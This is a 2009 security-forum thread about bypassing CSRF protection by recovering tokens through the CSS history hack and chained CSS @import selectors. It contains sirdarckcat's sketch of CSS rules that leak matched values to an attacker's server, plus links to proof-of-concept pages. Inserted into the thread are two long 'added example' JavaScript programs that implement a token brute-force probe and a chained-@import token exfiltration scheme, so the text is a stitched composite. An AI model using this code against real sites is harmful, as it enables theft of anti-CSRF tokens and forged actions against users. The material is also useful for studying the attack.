Q and A on cross-site request forgeries and breaking into sessions. It's one of the attacks that XSS enables and the attack of the future. For session fixation, hijacking, lockout, replay, session riding etc.
Hacking CSRF tokens using CSS History Hack
Posted by: Inferno
Date: July 18, 2009 01:12AM

Hi Ha.ckers,

I came up with this idea of brute forcing CSRF tokens using the CSS history hack and want to get your opinions on it. Currently it works OK to brute force tokens of 5 chars length; it might be feasible in future for longer tokens - http://securethoughts.com/2009/07/hacking-csrf-tokens-using-css-history-hack/

-
Inferno
SecureThoughts.com

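The probe Inferno's post describes, written out as an added example (this is not Inferno's PoC or any code from this thread). ACTION_URL, the csrf parameter name and the token length are assumptions. The point clayfox makes below also holds here: every candidate is tested locally against the browser's history, so the target site sees no failed attempts. Note that since around 2011 mainstream browsers stopped exposing :visited styling through getComputedStyle, so this probe no longer works against a current browser; it shows the shape of the attack as it stood in 2009.

```javascript
// Added example, not Inferno's PoC: the shape of a CSS history-hack probe
// for a token carried in a URL. ACTION_URL, the parameter name and the
// token length are assumptions; nothing here contacts the target site.

const ALPHABET = '0123456789abcdef';
const ACTION_URL = 'http://target.example/account/transfer?csrf=';   // assumed
const VISITED_COLOR = 'rgb(255, 0, 0)';   // what the probe stylesheet paints :visited

// Lazily enumerate every candidate token: |alphabet|^length of them, which is
// the 16^5 = 1048576 key space discussed in the thread for 5 hex chars.
function* candidateUrls(base, length, alphabet = ALPHABET) {
  const total = Math.pow(alphabet.length, length);
  for (let i = 0; i < total; i++) {
    let n = i;
    let s = '';
    for (let k = 0; k < length; k++) {
      s = alphabet[n % alphabet.length] + s;
      n = Math.floor(n / alphabet.length);
    }
    yield base + s;
  }
}

// Probe markup: a stylesheet that colours visited links and one <a> per
// candidate. The links are never clicked; only their computed style is read.
function buildProbeHtml(urls) {
  const links = [];
  for (const u of urls) links.push(`<a href="${u}">x</a>`);
  return `<style>a{color:#000} a:visited{color:#f00}</style>\n${links.join('\n')}`;
}

// Read back which candidates the browser paints as visited. `getStyle` stands
// in for window.getComputedStyle so the logic can be exercised without a DOM.
function visitedTokens(anchors, getStyle, prefix) {
  const found = [];
  for (const a of anchors) {
    if (a.href.startsWith(prefix) && getStyle(a).color === VISITED_COLOR) {
      found.push(a.href.slice(prefix.length));
    }
  }
  return found;
}

// Browser driver: render the probe in batches (a million anchors at once
// would stall the page), collect hits, and remove the evidence.
function runInBrowser(base, length, batch = 5000) {
  const hits = [];
  let pending = [];
  const flush = () => {
    if (pending.length === 0) return;
    const box = document.createElement('div');
    box.innerHTML = buildProbeHtml(pending);
    document.body.appendChild(box);
    hits.push(...visitedTokens(box.querySelectorAll('a'), el => getComputedStyle(el), base));
    box.remove();
    pending = [];
  };
  for (const u of candidateUrls(base, length)) {
    pending.push(u);
    if (pending.length === batch) flush();
  }
  flush();
  return hits;
}
```

In a browser of the period, `runInBrowser(ACTION_URL, 5)` returns the token values that appear in visited URLs; the pure functions above are what the batches are built from and can be exercised outside a browser.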
Re: Hacking CSRF tokens using CSS History Hack
Posted by: clayfox
Date: July 18, 2009 04:52PM

I don't think that will work for nonces, but for persistent tokens that could be a great idea. One problem with the usual brute force techniques is that your invalid attempts get logged. This would be a way around that since it wouldn't hit the site you are attacking, just the user.

This wouldn't work for nonces, because they will only show up once they are used.

-clayfox

Re: Hacking CSRF tokens using CSS History Hack
Posted by: Inferno
Date: July 18, 2009 06:12PM

For nonces, it depends. Many systems allow older nonces in the active user session to support back and forward browser buttons. If that is the case, then yes, this technique would work. Otherwise, no.

Re: Hacking CSRF tokens using CSS History Hack
Posted by: clayfox
Date: July 20, 2009 08:19AM

Nonce is a combination of the words "Number" and "Once". A nonce by definition is only used once, otherwise it is generally referred to as a token or key. Systems that allow that sort of behavior are using tokens, not nonces.

-clayfox

Re: Hacking CSRF tokens using CSS History Hack
Posted by: Gareth Heyes
Date: July 20, 2009 09:23AM

sirdarckcat demoed a better technique using just CSS, no JavaScript:
http://sla.ckers.org/forum/read.php?13,25016

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: Hacking CSRF tokens using CSS History Hack
Posted by: Inferno
Date: July 20, 2009 10:37AM

@Gareth, thanks for pointing this out! Using a CSS PoC is better than my JavaScript, and works even when someone completely disables JavaScript :). Can you please share the source code for this PHP page - http://sla.ckers.org/files/css_tokens.php. Can you please put a download link here or send it to my email id Inferno {at} SecureThoughts.com

Re: Hacking CSRF tokens using CSS History Hack
Posted by: Gareth Heyes
Date: July 20, 2009 11:12AM

http://www.businessinfo.co.uk/labs/css_token_stealer/css_tokens.zip

Re: Hacking CSRF tokens using CSS History Hack
Posted by: Inferno
Date: July 20, 2009 03:12PM

@Gareth,

I think you are missing the point of my attack. Sirdarckcat's work is on an entirely different side and it requires active CSS injection in the form page. My technique is based on the CSS history hack by Jeremiah and it does not require any injection.

Thanks,
Inferno

Re: Hacking CSRF tokens using CSS History Hack
Posted by: Gareth Heyes
Date: July 20, 2009 04:10PM

@Inferno

I think you are misunderstanding my point: using CSS selectors it's possible to accomplish the same thing, and I posted the technique a while ago:

http://www.businessinfo.co.uk/labs/css_scripting_kit/css_scripting_kit.php

Sirdarckcat took it a stage further by using CSS to examine the values.

Re: Hacking CSRF tokens using CSS History Hack
Posted by: Inferno
Date: July 20, 2009 04:46PM

Gareth,

I am getting your point now; with the last PoC it was a little unclear. So, yes, my PoC can be improved to be pure CSS based without JS.

However, I still feel that a pure CSS attack might be more problematic because your HTML file will be very large, since it will contain all the brute force values. A base-16 token of length 5 will have a key space of 1048576. Any way to overcome this?

But still pure CSS is very very innovative approach found by sirdarckcat and you.

Re: Hacking CSRF tokens using CSS History Hack
Posted by: Gareth Heyes
Date: July 20, 2009 05:26PM

@Inferno

Yeah, sirdarckcat and Stefano Di Paola found you could link stylesheets together to brute force the key faster by reading pairs of keys using the @import command.

Re: Hacking CSRF tokens using CSS History Hack
Posted by: sirdarckcat
Date: July 21, 2009 05:08AM

http://eaea.sirdarckcat.net/css-sib/urlbruteforce.php
http://eaea.sirdarckcat.net/cssar/v2/
http://eaea.sirdarckcat.net/csschallenge.html
http://eaea.sirdarckcat.net/cssh-mon/cssh-mon.php
etc...
http://p42.us/css

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: Hacking CSRF tokens using CSS History Hack
Posted by: rvdh
Date: July 21, 2009 07:47AM

Have to agree that SDC and Gaz came with these things.

btw, if you research something, don't you Google for it FIRST? This way you don't indulge in stuff that has been researched already, which saves you a lot of time to research other things.

Re: Hacking CSRF tokens using CSS History Hack
Posted by: Inferno
Date: July 21, 2009 09:18AM

@sirdarckcat - thanks for the improved PoCs with pure CSS.

@rvdh, I do Google things before writing them up. Believe me or not, the concept was not discussed anywhere else before. People knew the history hack to check visited websites only. If you still don't believe, try to find this PoC in Google - http://eaea.sirdarckcat.net/css-sib/urlbruteforce.php.

What I should have done is to improve my PoC, which currently uses a combination of CSS and JS (old one). My PoC could be much better developed using Sirdarckcat's and Gareth's techniques using pure CSS, and I totally agree.

@sirdarckcat - if you have some time, can you please show us the way to link multiple stylesheets together, which Gareth pointed out could brute force keys faster. Can you please try to see how much time it takes on a 5 or 6 digit base-16 keyspace. I wanted to add your reference in my post, along with your improved PoC and some time readings.

Re: Hacking CSRF tokens using CSS History Hack
Posted by: Anonymous User
Date: July 21, 2009 12:20PM

http://www.heise.de/security/Schutz-vor-Attacken-durch-Cross-Site-Request-Forgery-ausgehebelt--/news/meldung/142272

In Germany you're a star already ;)

Re: Hacking CSRF tokens using CSS History Hack
Posted by: Inferno
Date: July 21, 2009 12:54PM

Thx. Thanks, Mario, for posting.

Re: Hacking CSRF tokens using CSS History Hack
Posted by: sirdarckcat
Date: July 22, 2009 10:18AM

Actually you are right, almost all this CSS stuff is either in the talk we gave at BlueHat (that wasn't very famous), and we later published the ppt, or in some Google group, or I don't remember haha.. I posted some of this stuff on my blog, and Gareth on his, and thornmaker also... We'll probably do a whitepaper or something like that.. just after this crazy university/start-working/talk/ppt/talk/etc.. things finish happening.. I'm presenting at Black Hat next week and 2 weeks after that at XCon, and well.. after that I will finally have time (and a motivation to start writing about all this and other things I left unfinished last year).

I think that all XSS filters are blocking just JavaScript :) and that's cool, since in some time we will start seeing how CSS-based attacks start appearing.

The PoC that is not on Google (urlbruteforce.php) is not on Google because it was distributed in a .zip that was made by Gareth last year or something like that.. Sadly Google doesn't index zip files (yet).

Linking multiple stylesheets together was about using @import rules that were conditioned on the result of another rule.. This is used in the first version of the attribute reader that can be found on p42.us/css

The idea is.. having a:

<style>
/* step 1: pull in a stylesheet whose rules each fire on one condition */
@import "/?fetch-first-rules";
</style>

and fetch-first-rules has:

/* each selector matches only when its condition holds; the browser then
   requests that background URL, which tells the server which condition fired */
condition1 {
  background: url(/?b=condition1);
}
condition2 {
  background: url(/?b=condition2);
}
condition3 {
  background: url(/?b=condition3);
}

and then

<style>
/* step 2: the server builds this sheet from the /?b= hits it has seen */
@import "/?fetch-new-rules";
</style>

The fetch-new-rules stylesheet depends on which of conditions 1, 2 or 3 were triggered.

You can then expand this approach by importing other stylesheets inside each imported rule, each one of them conditioned to the result of previous rules.

So, the general idea is.. you have N imports
1.- the first import will return you a histogram of the chars (eg. '0'x2,'5'x1,'6'x7, etc..)
2.- the second import will try to match and count the occurrences of pairs of chars (eg. 00 01 05 06 56 66 etc..)
3.- the third import will try to match and count the occurrences of each possible matched pair (eg. 0056 0066 6600 6656 6665 5600 5666 etc)
4.- the fourth import will try to match and count the occurrences of each possible matched pair of pairs (eg. 0056 6666)
5.- the fifth import will know that the value is one of several possible values, so it will send a try for exact matches (eg. the only possible one is 0056666666).

It's important to consider that the amount of imports needed and comparisons depend on the algorithm, and the string.

So, to answer your question:
> Can you please try to see how much time it takes on 5 or 6 digit base 16 keyspace.

It depends on the string (the base is irrelevant, either base 2 or base 64 it's the same). It can be either one stylesheet matching single occurrences (like 012345, which is the best case scenario) or, in the worst case scenario.. for 6 chars, it could be 3 very big includes (it's pretty easy actually) or several smaller includes. (So you have either 3 big stylesheets or 5 small stylesheets.)

When it gets complicated is when the base exceeds the length of the string (base 16 with 32 chars for example), since then the algorithm is more complex when matching single occurrences.

Check the PoC's algorithms and the PPT..

Greetings!!

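The chained-@import scheme sirdarckcat sketches above, and Inferno's earlier worry about stylesheet size, modelled as an added example that is not the thread's code or any of the linked PoCs. The victim form, the token, the endpoint names (/step, /leak) and the server's behaviour (holding each /step response until the previous step's /leak hits have been logged) are all assumptions made here. It uses plain prefix extension, one character per import, rather than the histogram/pair-matching algorithm sirdarckcat describes, which is enough to show why chaining beats a flat brute force: length × |alphabet| rules instead of |alphabet|^length.

```javascript
// Added example, not code from the thread: a model of the chained-@import
// attribute reader sirdarckcat describes. The page, token, endpoint names
// (/step, /leak) and the server behaviour are assumptions made here.

const ALPHABET = '0123456789abcdef';   // base-16 token, as in the thread
const TOKEN_LEN = 10;

// Constructed victim page: a rendered form field carrying the token.
// The attack needs CSS injected into this page (unlike the history hack).
// Elements that are display:none may never fetch their background, so a
// hidden input would first need to be made visible; a text input is used here.
const VICTIM_HTML = '<form><input type="text" name="csrf" value="0056666666"></form>';

// Attacker's injected CSS: one <style> per step. Each @import is answered by
// the attacker's server, which (by assumption) holds /step?n=k until the
// /leak requests triggered by step k-1 have been logged.
function buildInjection(steps) {
  let out = '';
  for (let n = 0; n < steps; n++) out += `<style>@import url(/step?n=${n});</style>\n`;
  return out;
}

// Server side: rules for one step, conditioned on the prefixes that survived
// the previous step. A rule only matches (and only then does the browser
// request /leak?p=...) when the field's value starts with that candidate.
function buildStylesheet(prefixes) {
  const rules = [];
  for (const prefix of prefixes) {
    for (const ch of ALPHABET) {
      const cand = prefix + ch;
      rules.push(`input[name="csrf"][value^="${cand}"]{background:url(/leak?p=${cand})}`);
    }
  }
  return rules.join('\n');
}

// Stand-in for the browser's selector matching: report which /leak URLs
// would be requested for the given stylesheet against the victim page.
function browserLeaks(css, html) {
  const value = (html.match(/name="csrf" value="([^"]*)"/) || [, ''])[1];
  const rule = /\[value\^="([0-9a-f]*)"\]\{background:url\(\/leak\?p=([0-9a-f]*)\)\}/g;
  const hits = [];
  let m;
  while ((m = rule.exec(css)) !== null) {
    if (value.startsWith(m[1])) hits.push(m[2]);
  }
  return hits;
}

// The whole exchange: server emits a sheet, browser leaks, server refines.
// Returns null if no candidate survives (wrong field name, shorter token...).
function recoverToken(html, length) {
  let prefixes = [''];
  let rulesSent = 0;
  for (let n = 0; n < length; n++) {
    const css = buildStylesheet(prefixes);
    rulesSent += css.split('\n').length;
    prefixes = browserLeaks(css, html);   // what the server's log shows
    if (prefixes.length === 0) return { token: null, rulesSent };
  }
  return { token: prefixes.length === 1 ? prefixes[0] : null, rulesSent };
}

// Cost of a single flat stylesheet holding every full-length candidate,
// the "HTML file will be very large" case raised earlier in the thread.
function flatRuleCount(length) {
  return Math.pow(ALPHABET.length, length);
}

if (typeof require !== 'undefined' && require.main === module) {
  const r = recoverToken(VICTIM_HTML, TOKEN_LEN);
  console.log(buildInjection(TOKEN_LEN));
  console.log(`recovered ${r.token} with ${r.rulesSent} rules (flat brute force: ${flatRuleCount(TOKEN_LEN)})`);
}
```

For the 10-character hex token above the chained version sends 160 rules across 10 stylesheets, against 16^10 rules for a flat sheet; a real server would also have to stall each /step response, and whether the background of a non-displayed element is fetched at all is browser dependent.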
Re: Hacking CSRF tokens using CSS History Hack
Posted by: rvdh
Date: July 22, 2009 11:10AM

I find plenty of stuff on Google, including CSS CSRF.

btw, clickjacking had been done months before RSnake:

http://own-the.net/poc/digg_csrf/index.html

I don't assume people raid other people's work (although I do see that quite a lot, since this field is running short on PoCs I guess). But if you know how to use your search engine properly you will find most research, or approximations to it.

When I start on something I usually spend countless hours looking for data that is known or unknown, because it not only saves me time, it also prevents other people (rightly or wrongfully) accusing you of something, and you can reference it.
